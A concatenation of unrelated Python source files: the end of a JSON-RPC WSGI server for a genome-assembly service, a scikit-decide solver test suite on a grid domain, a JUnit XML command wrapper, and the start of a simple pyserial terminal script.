def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Velvet'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Velvet.run_velvet,
name='Velvet.run_velvet',
types=[dict])
self.method_authentication['Velvet.run_velvet'] = 'required' # noqa
self.rpc_service.add(impl_Velvet.status,
name='Velvet.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Velvet ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
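# Illustrative sketch (editor-added): start_server(newprocess=True) runs the
# WSGI app in a child process and returns the system-assigned port, so a test
# can exercise the JSON-RPC endpoint and then call stop_server(). This helper
# is a hypothetical example and is not invoked anywhere in this module.
def _demo_start_stop_server():
    port = start_server(port=0, newprocess=True)
    print("Test server listening on port %s" % port)
    stop_server()
    return port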
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_solvers.py
|
# Copyright (c) AIRBUS and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import pytest
import inspect
from enum import Enum
from typing import NamedTuple, Optional
from math import sqrt
from pathos.helpers import mp
from stable_baselines3 import PPO
from skdecide import DeterministicPlanningDomain, TransitionValue, \
Space, ImplicitSpace, \
EnvironmentOutcome, TransitionOutcome, \
SingleValueDistribution
from skdecide.builders.domain import UnrestrictedActions
from skdecide.hub.space.gym import EnumSpace, MultiDiscreteSpace
from skdecide.utils import load_registered_solver
# Must be defined outside the grid_domain() fixture
# so that parallel domains can pickle it
# /!\ Is it worth defining the domain as a fixture?
class State(NamedTuple):
x: int
y: int
s: int # step => to make the domain cycle-free for algorithms like AO*
# Must be defined outside the grid_domain() fixture
# so that parallel domains can pickle it
# /!\ Is it worth defining the domain as a fixture?
class Action(Enum):
up = 0
down = 1
left = 2
right = 3
class D(DeterministicPlanningDomain, UnrestrictedActions):
T_state = State # Type of states
T_observation = T_state # Type of observations
T_event = Action # Type of events
T_value = float # Type of transition values (rewards or costs)
T_info = None # Type of additional information given as part of an environment outcome
class GridDomain(D):
def __init__(self, num_cols=10, num_rows=10):
self.num_cols = num_cols
self.num_rows = num_rows
def _get_next_state(self, memory: D.T_memory[D.T_state],
action: D.T_agent[D.T_concurrency[D.T_event]]) -> D.T_state:
if action == Action.left:
next_state = State(max(memory.x - 1, 0), memory.y, memory.s + 1)
if action == Action.right:
next_state = State(min(memory.x + 1, self.num_cols - 1), memory.y, memory.s + 1)
if action == Action.up:
next_state = State(memory.x, max(memory.y - 1, 0), memory.s + 1)
if action == Action.down:
next_state = State(memory.x, min(memory.y + 1, self.num_rows - 1), memory.s + 1)
return next_state
def _get_transition_value(self, memory: D.T_memory[D.T_state], action: D.T_agent[D.T_concurrency[D.T_event]],
next_state: Optional[D.T_state] = None) -> D.T_agent[TransitionValue[D.T_value]]:
if next_state.x == memory.x and next_state.y == memory.y:
cost = 2 # big penalty when hitting a wall
else:
cost = abs(next_state.x - memory.x) + abs(next_state.y - memory.y) # every move costs 1
return TransitionValue(cost=cost)
def _is_terminal(self, state: D.T_state) -> bool:
return self._is_goal(state) or state.s >= 100
def _get_action_space_(self) -> D.T_agent[Space[D.T_event]]:
return EnumSpace(Action)
def _get_goals_(self) -> D.T_agent[Space[D.T_observation]]:
return ImplicitSpace(lambda state: state.x == (self.num_cols - 1) and state.y == (self.num_rows - 1))
def _get_initial_state_(self) -> D.T_state:
return State(x=0, y=0, s=0)
def _get_observation_space_(self) -> D.T_agent[Space[D.T_observation]]:
return MultiDiscreteSpace([self.num_cols, self.num_rows, 100])
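# Illustrative sketch (editor-added, assuming only the classes defined above):
# stepping GridDomain by hand with a fixed go-right-then-down policy, mirroring
# the observation/outcome API used by get_plan() further below. Not used by the
# fixtures or tests.
def _demo_grid_domain_rollout():
    domain = GridDomain(num_cols=3, num_rows=3)
    observation = domain.reset()
    total_cost = 0
    while not domain.is_goal(observation) and observation.s < 10:
        action = Action.right if observation.x < domain.num_cols - 1 else Action.down
        outcome = domain.step(action)
        total_cost += outcome.value.cost
        observation = outcome.observation
    return observation, total_cost  # expected: State(x=2, y=2, s=4), cost 4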
# FIXTURES
@pytest.fixture(params=[{'entry': 'Astar',
'config': {'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'debug_logs': False},
'optimal': True},
{'entry': 'AOstar',
'config': {'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'debug_logs': False},
'optimal': True},
{'entry': 'BFWS',
'config': {'state_features': lambda d, s: (s.x, s.y),
'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'termination_checker': lambda d, s: d.is_goal(s),
'debug_logs': False},
'optimal': True},
{'entry': 'IW',
'config': {'state_features': lambda d, s: (s.x, s.y),
'debug_logs': False},
'optimal': True},
{'entry': 'RIW',
'config': {'state_features': lambda d, s: (s.x, s.y),
'time_budget': 20,
'rollout_budget': 10,
'max_depth': 10,
'exploration': 0.25,
'use_simulation_domain': True,
'online_node_garbage': True,
'continuous_planning': True,
'debug_logs': False},
'optimal': False},
{'entry': 'UCT',
'config': {'time_budget': 20,
'rollout_budget': 10,
'max_depth': 10,
'continuous_planning': True,
'debug_logs': False},
'optimal': False},
{'entry': 'LRTDP',
'config': {'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'use_labels': True,
'time_budget': 60000,
'rollout_budget': 10000,
'max_depth': 500,
'discount': 1.0,
'epsilon': 0.001,
'online_node_garbage': True,
'continuous_planning': False,
'debug_logs': False},
'optimal': True},
{'entry': 'ILAOstar',
'config': {'heuristic': lambda d, s: sqrt((d.num_cols - 1 - s.x)**2 + (d.num_rows - 1 - s.y)**2),
'discount': 1.0,
'epsilon': 0.001,
'debug_logs': False},
'optimal': True}])
def solver_cpp(request):
return request.param
@pytest.fixture(params=[{'entry': 'LazyAstar',
'config': {'verbose': False},
'optimal': True},
{'entry': 'StableBaseline',
'config': {'algo_class': PPO,
'baselines_policy': 'MlpPolicy',
'learn_config': {'total_timesteps': 10},
'verbose': 1},
'optimal': False}])
def solver_python(request):
return request.param
@pytest.fixture(params=[False, True])
def parallel(request):
return request.param
@pytest.fixture(params=[False, True])
def shared_memory(request):
return request.param
# HELPER FUNCTION
def get_plan(domain, solver):
plan = []
cost = 0
observation = domain.reset()
nb_steps = 0
while (not domain.is_goal(observation)) and nb_steps < 20:
plan.append(solver.sample_action(observation))
outcome = domain.step(plan[-1])
cost += outcome.value.cost
observation = outcome.observation
nb_steps += 1
return plan, cost
# SHARED MEMORY PROXY FOR PARALLEL TESTS
class GridShmProxy:
_register_ = [(State, 2), (Action, 1), (EnumSpace, 1), (SingleValueDistribution, 1),
(TransitionValue, 1), (EnvironmentOutcome, 1), (TransitionOutcome, 1),
(bool, 1), (float, 1), (int, 2)]
def __init__(self):
self._proxies_ = {State: GridShmProxy.StateProxy, Action: GridShmProxy.ActionProxy,
EnumSpace: GridShmProxy.EnumSpaceProxy,
SingleValueDistribution: GridShmProxy.SingleValueDistributionProxy,
TransitionValue: GridShmProxy.TransitionValueProxy,
EnvironmentOutcome: GridShmProxy.EnvironmentOutcomeProxy,
TransitionOutcome: GridShmProxy.TransitionOutcomeProxy,
bool: GridShmProxy.BoolProxy,
float: GridShmProxy.FloatProxy,
int: GridShmProxy.IntProxy}
def copy(self):
p = GridShmProxy()
p._proxies_ = dict(self._proxies_)
return p
def register(self):
return GridShmProxy._register_
def initialize(self, t):
return self._proxies_[t].initialize()
def encode(self, value, shm_value):
self._proxies_[type(value)].encode(value, shm_value)
def decode(self, t, shm_value):
return self._proxies_[t].decode(shm_value)
class StateProxy:
@staticmethod
def initialize():
return mp.Array('d', [0, 0, 0], lock=True)
@staticmethod
def encode(state, shm_state):
shm_state[0] = state.x
shm_state[1] = state.y
shm_state[2] = state.s
@staticmethod
def decode(shm_state):
return State(int(shm_state[0]), int(shm_state[1]), int(shm_state[2]))
class ActionProxy:
@staticmethod
def initialize():
return mp.Value('I', 0, lock=True)
@staticmethod
def encode(action, shm_action):
shm_action.value = action.value
@staticmethod
def decode(shm_action):
return Action(shm_action.value)
class EnumSpaceProxy: # Always used with Action as enum class
@staticmethod
def initialize():
return mp.Array('c', b'')
@staticmethod
def encode(val, shm_val):
pass
@staticmethod
def decode(val):
return EnumSpace(Action)
class SingleValueDistributionProxy: # Always used with State
@staticmethod
def initialize():
return GridShmProxy.StateProxy.initialize()
@staticmethod
def encode(svd, shm_svd):
GridShmProxy.StateProxy.encode(svd._value, shm_svd)
@staticmethod
def decode(svd):
return SingleValueDistribution(GridShmProxy.StateProxy.decode(svd))
class TransitionValueProxy:
@staticmethod
def initialize():
return [mp.Value('d', 0), mp.Value('b', False)]
@staticmethod
def encode(value, shm_value):
if value.reward is not None:
shm_value[0] = value.reward
shm_value[1] = True
elif value.cost is not None:
shm_value[0] = value.cost
shm_value[1] = False
else:
shm_value[0] = 0
shm_value[1] = True
@staticmethod
def decode(value):
if value[1].value:
return TransitionValue(reward=value[0].value)
else:
return TransitionValue(cost=value[0].value)
class EnvironmentOutcomeProxy:
@staticmethod
def initialize():
return [GridShmProxy.StateProxy.initialize()] + \
GridShmProxy.TransitionValueProxy.initialize() + \
[GridShmProxy.BoolProxy.initialize()]
@staticmethod
def encode(outcome, shm_outcome):
GridShmProxy.StateProxy.encode(outcome.observation, shm_outcome[0])
GridShmProxy.TransitionValueProxy.encode(outcome.value, shm_outcome[1:3])
GridShmProxy.BoolProxy.encode(outcome.termination, shm_outcome[3])
@staticmethod
def decode(outcome):
return EnvironmentOutcome(observation=GridShmProxy.StateProxy.decode(outcome[0]),
value=GridShmProxy.TransitionValueProxy.decode(outcome[1:3]),
termination=GridShmProxy.BoolProxy.decode(outcome[3]))
class TransitionOutcomeProxy:
@staticmethod
def initialize():
return [GridShmProxy.StateProxy.initialize()] + \
GridShmProxy.TransitionValueProxy.initialize() + \
[GridShmProxy.BoolProxy.initialize()]
@staticmethod
def encode(outcome, shm_outcome):
GridShmProxy.StateProxy.encode(outcome.state, shm_outcome[0])
GridShmProxy.TransitionValueProxy.encode(outcome.value, shm_outcome[1:3])
GridShmProxy.BoolProxy.encode(outcome.termination, shm_outcome[3])
@staticmethod
def decode(outcome):
return TransitionOutcome(state=GridShmProxy.StateProxy.decode(outcome[0]),
value=GridShmProxy.TransitionValueProxy.decode(outcome[1:3]),
termination=GridShmProxy.BoolProxy.decode(outcome[3]))
class BoolProxy:
@staticmethod
def initialize():
return mp.Value('b', False)
@staticmethod
def encode(val, shm_val):
shm_val.value = val
@staticmethod
def decode(val):
return bool(val.value)
class FloatProxy:
@staticmethod
def initialize():
            return mp.Value('d', 0.0)
@staticmethod
def encode(val, shm_val):
shm_val.value = val
@staticmethod
def decode(val):
return float(val.value)
class IntProxy:
@staticmethod
def initialize():
            return mp.Value('i', 0)
@staticmethod
def encode(val, shm_val):
shm_val.value = val
@staticmethod
def decode(val):
return int(val.value)
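# Illustrative sketch (editor-added): round-tripping a State through the
# shared-memory proxies above, using the pathos mp helpers imported at the top
# of this file. Purely a usage example; the tests below never call it.
def _demo_state_shm_roundtrip():
    proxy = GridShmProxy()
    shm_state = proxy.initialize(State)
    proxy.encode(State(x=2, y=3, s=4), shm_state)
    return proxy.decode(State, shm_state)  # -> State(x=2, y=3, s=4)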
# TESTS
def do_test_cpp(solver_cpp, parallel, shared_memory, result):
noexcept = True
try:
dom = GridDomain()
solver_type = load_registered_solver(solver_cpp['entry'])
solver_args = solver_cpp['config']
if 'parallel' in inspect.signature(solver_type.__init__).parameters:
solver_args['parallel'] = parallel
if 'shared_memory_proxy' in inspect.signature(solver_type.__init__).parameters and shared_memory:
solver_args['shared_memory_proxy'] = GridShmProxy()
solver_args['domain_factory'] = lambda: GridDomain()
with solver_type(**solver_args) as slv:
GridDomain.solve_with(slv)
plan, cost = get_plan(dom, slv)
except Exception as e:
print(e)
noexcept = False
result.send(solver_type.check_domain(dom) and noexcept and \
((not solver_cpp['optimal']) or parallel or (cost == 18 and len(plan) == 18)))
result.close()
def test_solve_cpp(solver_cpp, parallel, shared_memory):
    # We launch each algorithm in a separate process to prevent the various
    # algorithms from initializing different versions of the OpenMP library in the
    # same process (our C++ hub algorithms and other algorithms like PPO - via
    # torch - might link against different OpenMP libraries)
pparent, pchild = mp.Pipe(duplex=False)
p = mp.Process(target=do_test_cpp, args=(solver_cpp, parallel, shared_memory, pchild,))
p.start()
r = pparent.recv()
p.join()
p.close()
pparent.close()
assert r
def do_test_python(solver_python, result):
noexcept = True
try:
dom = GridDomain()
solver_type = load_registered_solver(solver_python['entry'])
solver_args = solver_python['config']
with solver_type(**solver_args) as slv:
GridDomain.solve_with(slv)
plan, cost = get_plan(dom, slv)
except Exception as e:
print(e)
noexcept = False
result.send(solver_type.check_domain(dom) and noexcept and \
((not solver_python['optimal']) or (cost == 18 and len(plan) == 18)))
result.close()
def test_solve_python(solver_python):
    # We launch each algorithm in a separate process to prevent the various
    # algorithms from initializing different versions of the OpenMP library in the
    # same process (our C++ hub algorithms and other algorithms like PPO - via
    # torch - might link against different OpenMP libraries)
pparent, pchild = mp.Pipe(duplex=False)
p = mp.Process(target=do_test_python, args=(solver_python, pchild,))
p.start()
r = pparent.recv()
p.join()
p.close()
pparent.close()
assert r
|
junit_cmd_wrapper.py
|
#!/usr/bin/env python
import argparse
import logging
import string
import subprocess
import sys
import time
import xml.etree.cElementTree as ElementTree
from io import BytesIO
from threading import Thread
logger = logging.getLogger('ta-junit-wrapper')
class TeeBytesIO(BytesIO):
"""duplicate each write command to an additional file object"""
def __init__(self, tee_fh):
self.tee_fh = tee_fh
super(TeeBytesIO, self).__init__()
def write(self, s):
self.tee_fh.write(s)
BytesIO.write(self, s)
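# Illustrative sketch (editor-added): every write to a TeeBytesIO is mirrored
# to the wrapped file object while still being buffered in memory, which is how
# the wrapper below can both stream and capture the child process output.
def _demo_tee_bytes_io():
    sink = BytesIO()
    tee = TeeBytesIO(sink)
    tee.write(b'hello')
    return tee.getvalue(), sink.getvalue()  # (b'hello', b'hello')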
def get_parser():
parser = argparse.ArgumentParser(description='JUNIT wrapper')
parser.add_argument(
'-o',
'--output-file',
metavar='FILE',
type=argparse.FileType('w'),
help='output JUNIT XML file name',
required=True
)
parser.add_argument(
'-s',
'--test-suite',
metavar='NAME',
help='test suite name',
required=True
)
parser.add_argument(
'-t',
'--test-case',
metavar='NAME',
help='test case name',
required=True
)
parser.add_argument(
'-v',
'--verbose',
action='store_true',
help='verbose - duplicate command output to STDOUT'
)
parser.add_argument(
'--validate',
action='store_true',
help='validate generated XML against Jenkins XSD. Requires "requests" and "lxml" libraries'
)
parser.add_argument(
'--command',
nargs=argparse.REMAINDER,
help='command to be executed'
)
return parser
def get_file_copy_worker(infile, outfile):
def do_work(_infile, _outfile):
for line in iter(_infile.readline, ''):
_outfile.write(line)
_infile.close()
thread = Thread(target=do_work, args=(infile, outfile))
thread.daemon = True
thread.start()
return thread
def generate_junit_xml(test_suite, test_case, out_fh, stdout, stderr, return_code, duration_in_sec, command):
test_suite_root_element = ElementTree.Element(
'testsuite',
tests='1',
name=test_suite.replace(' ', '_'),
failures=str(1 if return_code != 0 else 0),
time=str(duration_in_sec)
)
test_case_element = ElementTree.SubElement(
test_suite_root_element,
'testcase',
time=str(duration_in_sec),
name=test_case.replace(' ', '_')
)
    ElementTree.SubElement(test_case_element, 'system-out').text = ''.join(
        c for c in stdout.getvalue().decode('utf-8', 'replace') if c in string.printable
    )
    ElementTree.SubElement(test_case_element, 'system-err').text = ''.join(
        c for c in stderr.getvalue().decode('utf-8', 'replace') if c in string.printable
    )
if return_code != 0:
failure_msg = 'Command "{cmd}" returned {ret}'.format(cmd=command, ret=return_code)
ElementTree.SubElement(
test_case_element,
'failure',
type='Non-Zero return code',
message=failure_msg)
ElementTree.ElementTree(test_suite_root_element).write(out_fh)
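# Illustrative sketch (editor-added): generating a report in memory with
# hypothetical suite/case names and captured output, without running a command.
def _demo_generate_junit_xml():
    report = BytesIO()
    generate_junit_xml('example suite', 'example case', report,
                       BytesIO(b'captured stdout'), BytesIO(b'captured stderr'),
                       return_code=0, duration_in_sec=0.25,
                       command=['echo', 'hello'])
    return report.getvalue()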
def main():
parser = get_parser()
args = parser.parse_args()
logging.basicConfig(
level=logging.DEBUG if args.verbose else logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
stream=sys.stdout
)
stdout = TeeBytesIO(sys.stdout) if args.verbose else BytesIO()
stderr = TeeBytesIO(stdout)
    logger.debug('Executing: ' + ' '.join(args.command))
start_time = time.time()
process = subprocess.Popen(args.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
threads = [
get_file_copy_worker(process.stdout, stdout),
get_file_copy_worker(process.stderr, stderr)
]
for t in threads: # wait for IO completion
t.join()
return_code = process.wait()
logger.debug('Wrapped process return code ' + str(return_code))
duration_in_sec = time.time() - start_time
with args.output_file as fh: # insure file object is closed - since it will be read in do_validate()
generate_junit_xml(
args.test_suite,
args.test_case,
fh,
stdout,
stderr,
return_code,
duration_in_sec,
args.command
)
logger.debug('Generated JUNIT report file ' + args.output_file.name)
if args.validate:
do_validate(args.output_file.name)
raise SystemExit(return_code)
if __name__ == '__main__':
main()
|
miniterm.py
|
#!/usr/bin/env python
#very simple serial terminal
#http://pyserial.sf.net package required
#input characters are sent directly, received characters are displayed as-is
#baudrate and echo configuration is done through globals:
#<cliechti@gmx.net>
import sys, os, serial, threading, getopt
#EXITCHARACTER = '\x1b'  #ESC
EXITCHARACTER = '\x04'   #ctrl+d
#first choose a platform dependent way to read single characters from the console
if os.name == 'nt': #sys.platform == 'win32':
import msvcrt
def getkey():
while 1:
if echo:
z = msvcrt.getche()
else:
z = msvcrt.getch()
if z == '\0' or z == '\xe0': #functions keys
msvcrt.getch()
else:
return z
elif os.name == 'posix':
    #XXX: Untested code derived from the Python FAQ....
# import termios, TERMIOS, sys, os
import termios, sys, os
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
new = termios.tcgetattr(fd)
    new[3] = new[3] & ~termios.ICANON & ~termios.ECHO
    new[6][termios.VMIN] = 1
    new[6][termios.VTIME] = 0
    termios.tcsetattr(fd, termios.TCSANOW, new)
s = '' # We'll save the characters typed and add them to the pool.
def getkey():
c = os.read(fd, 1)
if echo: sys.stdout.write(c)
return c
    def cleanup_console():
        termios.tcsetattr(fd, termios.TCSAFLUSH, old)
    sys.exitfunc = cleanup_console  #terminal modes have to be restored on exit...
else:
    raise NotImplementedError("Sorry no implementation for your platform (%s) available." % sys.platform)
def reader():
"""loop forever and copy serial->console"""
while 1:
sys.stdout.write(s.read())
def writer():
"""loop forever and copy console->serial"""
while 1:
c = getkey()
        if c == EXITCHARACTER: break    #exit on the exit character (ctrl+d)
s.write(c) #send character
if convert_outgoing_cr and c == '\r':
s.write('\n')
if echo: sys.stdout.write('\n')
#print a short help message
def usage():
print >>sys.stderr, """USAGE: %s [options]
Simple Terminal Program for the serial port.
options:
-p, --port=PORT: port, a number, default = 0 or a device name
-b, --baud=BAUD: baudrate, default 9600
-r, --rtscts: enable RTS/CTS flow control (default off)
-x, --xonxoff: enable software flow control (default off)
-e, --echo: enable local echo (default off)
-c, --cr: disable CR -> CR+LF translation
""" % sys.argv[0]
if __name__ == '__main__':
#parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hp:b:rxec",
["help", "port=", "baud=", "rtscts", "xonxoff", "echo", "cr"])
except getopt.GetoptError:
# print help information and exit:
usage()
sys.exit(2)
port = 0
baudrate = 9600
echo = 0
